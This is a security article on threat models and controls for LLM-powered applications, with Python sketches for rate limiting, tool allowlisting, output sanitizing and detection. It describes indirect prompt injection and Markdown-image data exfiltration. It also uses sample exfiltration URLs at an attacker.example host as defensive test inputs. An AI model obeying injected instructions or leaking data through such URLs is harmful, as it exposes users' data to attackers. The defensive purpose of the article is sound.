Securing the LLM Supply Chain: Threat Models for AI-Powered Apps

Most enterprise application security programs were designed for deterministic systems. LLM-powered applications break enough of those assumptions that a meaningful share of their attack surface goes uncovered by existing controls. The gap is widening as agentic patterns add tool-calling and external action capabilities to what used to be read-only chat interfaces.

The pace of deployment has outrun the pace of control maturity. A Gartner poll of executive leaders published in October 2023 found that 55% of organizations were piloting or in production with generative AI, while internal security review processes for AI features in our client base typically lag the first production deployment by one to two quarters. The result is that many LLM features run in production without a documented threat model, an explicit privilege boundary, or LLM-specific monitoring. In our work across financial services, healthcare, and SaaS engagements, this gap is the single most common finding.

What is new in the threat model

Five categories of risk are either new or substantially amplified in LLM-powered applications. The OWASP Top 10 for LLM Applications provides a useful taxonomy, but in practice the categories below carry the most weight in real incidents:

Prompt injection (direct and indirect). Direct prompt injection is widely understood. The harder variant is indirect: malicious instructions embedded in documents, web pages, or emails that the LLM later processes. Any system that ingests untrusted text and acts on it must assume that text contains hostile instructions. Greshake et al.'s 2023 paper demonstrated indirect injection attacks against Bing Chat and other production systems, and the attack class has since been reproduced against most major frontier-model deployments. No known general-purpose defense exists; mitigation is architectural.
Tool-calling and agent abuse. When the LLM can invoke tools (database queries, API calls, file system access), prompt injection becomes a code-execution primitive. The security boundary is no longer the model output; it is the privilege of the tool-calling agent. An agent with read-write access to a customer support ticketing system, for example, has the effective authority of a tier-one support engineer, and any document it processes is now an instruction channel.
Training data and weight provenance. Model weights, fine-tuning datasets, and embedding indexes are now part of the supply chain. Compromised weights can introduce backdoors that no application-layer test will find. SBOMs need an AI-BOM equivalent. NIST's AI Risk Management Framework treats data and model provenance as first-class supply-chain concerns; most enterprises we work with do not yet inventory their fine-tuning datasets at the level required to support an incident investigation.
Output exfiltration. Model outputs can serve as a side channel for exfiltration through crafted Markdown image URLs, link previews, or steganographic patterns in generated text. The pattern of choice in published exploits is a Markdown image whose URL encodes data the attacker has tricked the model into reading; the user's browser silently fetches the image and the data leaves the perimeter. The risk is especially relevant in agentic systems with network access, where the model can be induced to make outbound HTTP calls directly.
Model denial-of-wallet. Adversaries can drive cost rather than disrupt availability, by triggering long-context or expensive-tool invocations. With frontier-model context windows now reaching 1M tokens and per-million-token input pricing in the $3-15 range for top-tier models, a single abusive session can generate three- or four-figure costs in minutes. The economic attack is real and largely uncovered by traditional rate limiting, which counts requests rather than tokens or tool invocations.
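
The gap between request counting and token counting is easy to show with arithmetic. The sketch below is illustrative only: the price constant is the low end of the range quoted above, and `SessionBudget`, `input_cost_usd`, and the specific limits are hypothetical names and values chosen for the example, not a recommended configuration.

```python
from dataclasses import dataclass

# Assumed price for illustration: USD per million input tokens
# (the low end of the $3-15 range quoted in the text).
PRICE_PER_MILLION_INPUT_TOKENS = 3.00


def input_cost_usd(input_tokens: int,
                   price_per_million: float = PRICE_PER_MILLION_INPUT_TOKENS) -> float:
    """Estimate input-token spend for a given token count."""
    return input_tokens / 1_000_000 * price_per_million


@dataclass
class SessionBudget:
    """Hypothetical per-session limiter that tracks requests and tokens separately."""
    max_requests: int
    max_input_tokens: int
    requests: int = 0
    input_tokens: int = 0

    def admit(self, request_tokens: int) -> bool:
        """Record the request and return True only if it fits both limits."""
        if self.requests >= self.max_requests:
            return False
        if self.input_tokens + request_tokens > self.max_input_tokens:
            return False
        self.requests += 1
        self.input_tokens += request_tokens
        return True


# An abusive session: 100 requests that each fill a 1M-token context window.
request_only = SessionBudget(max_requests=100, max_input_tokens=10**12)  # token cap effectively off
token_aware = SessionBudget(max_requests=100, max_input_tokens=5_000_000)

for _ in range(100):
    request_only.admit(1_000_000)
    token_aware.admit(1_000_000)

print(input_cost_usd(request_only.input_tokens))  # 300.0
print(input_cost_usd(token_aware.input_tokens))   # 15.0
```

Both limiters allow the same number of requests, but only the token-aware one caps spend. Output tokens and tool invocations would need their own counters in a real deployment.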

The privilege boundary problem

The single most consequential design decision in an LLM-powered application is where the privilege boundary sits. In a chat assistant that only generates text, the boundary is at the output: the LLM can say anything, but only the user acts on its words. In an agentic system, the boundary moves to the tool layer: the LLM can act, and the tools' permissions become the effective security perimeter.

Most production incidents we have investigated trace back to a privilege boundary that was implicit rather than designed. The remediation is almost always the same: explicit allowlists for what tools can be invoked under what conditions, with the LLM treated as untrusted code rather than as part of the application logic. The mental model that works is the one Simon Willison has articulated repeatedly: the LLM is a confused deputy, and your architecture must assume any input it sees is potentially adversarial.
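
A minimal sketch of what an explicit allowlist can look like follows. The tool names, roles, and the `authorize` function are hypothetical and exist only to illustrate the pattern; the point is that the decision is made by application code against the user's privileges, with anything the model proposes outside the allowlist denied by default.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolPolicy:
    """Who may trigger a tool, and whether a separate confirmation is needed."""
    allowed_roles: frozenset
    requires_confirmation: bool = False


# Hypothetical allowlist for a support-ticket agent.
POLICIES = {
    "read_ticket": ToolPolicy(frozenset({"agent", "admin"})),
    "close_ticket": ToolPolicy(frozenset({"agent", "admin"}), requires_confirmation=True),
    "issue_refund": ToolPolicy(frozenset({"admin"}), requires_confirmation=True),
}


def authorize(tool_name: str, user_role: str, confirmed: bool = False) -> str:
    """Decide a model-proposed tool call. Returns 'allow', 'confirm', or 'deny'.

    The model's output only supplies tool_name; user_role and confirmed come
    from the application's own session state, never from model text.
    """
    policy = POLICIES.get(tool_name)
    if policy is None:
        return "deny"  # not on the allowlist: default deny
    if user_role not in policy.allowed_roles:
        return "deny"  # authorized on the user's behalf, not the model's
    if policy.requires_confirmation and not confirmed:
        return "confirm"  # route to a human or a non-LLM verification step
    return "allow"


print(authorize("read_ticket", "agent"))    # allow
print(authorize("close_ticket", "agent"))   # confirm
print(authorize("issue_refund", "agent"))   # deny
print(authorize("drop_database", "admin"))  # deny
```

Keeping the policy table in code or configuration, rather than in the system prompt, means an injected instruction cannot widen it.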

A counter-take worth stating plainly: we disagree with the prevailing vendor message that better models or stronger system prompts will close the prompt-injection gap. They will not. Empirical evaluations of model-layer defenses, including Anthropic's Constitutional Classifiers work on jailbreaks and academic red-team studies of prompt-injection defenses, consistently show attack success rates that remain non-trivial even against the strongest production defenses. Treating the model itself as a security control is the wrong frame. The right frame is the one used for sandboxing untrusted code: assume compromise, contain blast radius, and design for failure. Teams that buy the vendor narrative ship agentic features with broad tool privileges and discover the limits of model-layer defenses in production.

Controls that work

The control set that materially reduces risk in LLM-powered applications:

Input segregation. Treat untrusted text as data, not instructions, by structurally separating it in the prompt and using model features (system prompts, tool result tagging, Anthropic's XML tag conventions) that allow the model to distinguish provenance. This is necessary but not sufficient; it raises the cost of injection without eliminating the class.
Output filtering and policy enforcement. Outputs that will be rendered in HTML, executed as code, or sent to external systems must pass the same kinds of checks you would apply to user-generated content from an anonymous source. For Markdown rendering specifically, strip or proxy image URLs and external links by default; the exfiltration vectors here are well-documented and easy to close.
Tool-level authorization. Each tool call is authorized on the user's behalf, not the model's. The LLM proposes; the application authorizes. High-impact tools (anything that writes, sends external communications, or moves money) should require an additional check, whether human-in-the-loop confirmation, a separate policy engine, or a non-LLM verification step. We have seen well-designed agentic systems where roughly 10-20% of tool calls are gated by an explicit human confirmation, and this is the right ballpark for production systems with real consequences.
Audit logging at the prompt and tool level. Every prompt, every tool invocation, and every output should be logged in a way that supports incident response. Most teams discover this requirement during their first incident, when they cannot reconstruct what the model was told or what it did. Retention policies should match the rest of the security event pipeline, not the shorter retention common for ML training logs.
Cost and rate limits at multiple layers. Apply limits per user, per session, per tool, and per model, tracking request counts and token counts separately. The economic attack surface is real and underweighted. Token-aware rate limiting catches abuse that request-count limiting misses entirely.
AI-BOM and model provenance tracking. Track which models, fine-tuning datasets, and embedding indexes are in use, where they came from, and when they last changed. The Coalition for Secure AI and similar industry efforts are converging on standards here; teams should not wait for the standards to harden before starting their inventory.
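
As one illustration of the output filtering control above, the sketch below removes inline Markdown images unless they point at an approved host. It is a simplified example under stated assumptions: the allowlisted host is a placeholder, `strip_untrusted_images` is a hypothetical helper, and the regular expression only covers inline `![alt](url)` syntax. Reference-style images and raw HTML `<img>` tags are not handled here and would need sanitizing at the HTML rendering layer.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the application itself serves images from.
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

# Inline Markdown image: ![alt](url "optional title")
_INLINE_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str) -> str:
    """Replace inline images with a text placeholder unless the host is allowlisted."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and (parsed.hostname or "") in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        # Drop the URL entirely so the browser never issues the request.
        return f"[image removed: {alt}]"

    return _INLINE_IMAGE.sub(replace, markdown)


model_output = "Summary ![x](https://attacker.example/p.png?d=c2VjcmV0) done"
print(strip_untrusted_images(model_output))
# Summary [image removed: x] done
```

Proxying images through an application-controlled endpoint is an alternative to stripping them; either way the decision is made outside the model.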

What to assess this quarter

Three exercises deliver outsized signal.

First, run a structured red-team exercise against your highest-stakes LLM application, focused on indirect prompt injection through real document inputs. The exercise should include the document types the system actually processes (PDFs from customers, scraped web pages, email attachments) rather than synthetic adversarial prompts. We typically scope these as two-week engagements with a defined success criterion: can the red team cause an unauthorized tool invocation or data egress through document-mediated injection? The pass rate on first attempts is low; in our experience fewer than one in three production systems pass without remediation.

Second, map the privilege boundary explicitly. Write down what the LLM can cause to happen without further human authorization. List every tool, every API the agent can reach, and every effect each can have. Verify the answer matches the design intent. This exercise alone surfaces the majority of architectural issues, because the gap between "what we built" and "what we thought we built" is consistently wider than teams expect.
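
The mapping exercise can be kept as a small, reviewable artifact. The sketch below assumes a hand-maintained inventory; the tool names, effect labels, and the `boundary_drift` helper are hypothetical. It computes the set of effects the agent can cause without human approval and reports anything that exceeds the documented design intent.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolEntry:
    """One row of the privilege map: a tool, what it can do, and how it is gated."""
    name: str
    effects: frozenset
    human_approval: bool


# Hypothetical inventory, written down from the deployed configuration.
INVENTORY = [
    ToolEntry("search_kb", frozenset({"read:kb"}), human_approval=False),
    ToolEntry("update_ticket", frozenset({"write:tickets"}), human_approval=False),
    ToolEntry("send_email", frozenset({"send:external_email"}), human_approval=True),
]

# What the design document says the agent may do unattended (assumed for the example).
INTENDED_UNATTENDED = frozenset({"read:kb"})


def unattended_effects(inventory) -> set:
    """Every effect reachable without further human authorization."""
    effects = set()
    for tool in inventory:
        if not tool.human_approval:
            effects |= tool.effects
    return effects


def boundary_drift(inventory, intended) -> set:
    """Effects the agent can cause unattended that the design never sanctioned."""
    return unattended_effects(inventory) - intended


print(boundary_drift(INVENTORY, INTENDED_UNATTENDED))  # {'write:tickets'}
```

A non-empty result is the gap between "what we built" and "what we thought we built", stated in a form that can be checked again each time a tool is added.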

Third, add LLM-specific signals to your SIEM: prompt anomalies, tool-call patterns, cost spikes per user and per session, and unusual output characteristics (unexpected URLs, base64 blobs, large data volumes in responses). Standard application signals will not catch the LLM-specific attack patterns; the detection content has to be built specifically.
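
A rough sketch of how the output-side signals might be extracted before they are shipped to a SIEM follows. The patterns and thresholds are assumptions chosen for illustration, `output_signals` is a hypothetical helper, and the heuristics will produce false positives (a long URL path can look like a base64 run, for example), so they are a starting point for tuning, not finished detection content.

```python
import re
from urllib.parse import urlparse

URL_PATTERN = re.compile(r"https?://[^\s)>\]]+")
# Assumed threshold: 40+ consecutive base64-alphabet characters is suspicious.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def output_signals(text: str, expected_hosts: set, max_chars: int = 20_000) -> dict:
    """Extract simple per-response signals from a model output."""
    unexpected_urls = [
        url for url in URL_PATTERN.findall(text)
        if (urlparse(url).hostname or "") not in expected_hosts
    ]
    return {
        "unexpected_urls": unexpected_urls,           # links to hosts the app does not expect
        "base64_runs": len(BASE64_RUN.findall(text)),  # possible encoded payloads
        "oversized": len(text) > max_chars,            # unusually large response
    }


response = "See https://attacker.example/collect for details. " + "QUJD" * 12
print(output_signals(response, expected_hosts={"docs.example.com"}))
```

Each returned field maps to one of the output characteristics listed above; prompt anomalies, tool-call patterns, and cost spikes would come from separate collectors.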

For regulated industries, a fourth exercise: align the threat model documentation with the controls expected by your regulator. The EU AI Act brings concrete documentation requirements for high-risk AI systems, with the bulk of obligations applying from August 2026, and financial regulators including the OCC and FCA have issued guidance treating model risk management as applicable to LLM deployments. The compliance work is substantially easier when the threat model and control documentation already exist; retrofitting it under regulatory time pressure is consistently more expensive.

The bottom line

LLM-powered applications are not insecure by nature, but they are insecure by default for organizations that treat them as conventional web applications with a smarter backend. The threat model is genuinely different. The good news is that the controls that work are not exotic; they are application security fundamentals applied to a new privilege boundary.

The teams that get this right share a few habits. They treat the LLM as untrusted code from the day they write the design document. They invest in tool-layer authorization before they invest in prompt engineering. They build the audit and cost-monitoring infrastructure as part of the initial deployment, not after the first incident. And they take a clear position on what their agents can and cannot do without human authorization, rather than letting the boundary drift outward as new features ship.

The teams that get it wrong tend to share a different pattern: a belief that a sufficiently careful system prompt or a sufficiently capable model will handle the security problem. It will not. The supply chain for LLM-powered applications is wider than the model, includes data the application did not produce, and reaches into systems the security team has historically not had to reason about. Treating it as a supply-chain problem, with the inventory, provenance, and boundary discipline that implies, is the work that distinguishes production-grade AI applications from the prototypes that currently dominate the deployment base.
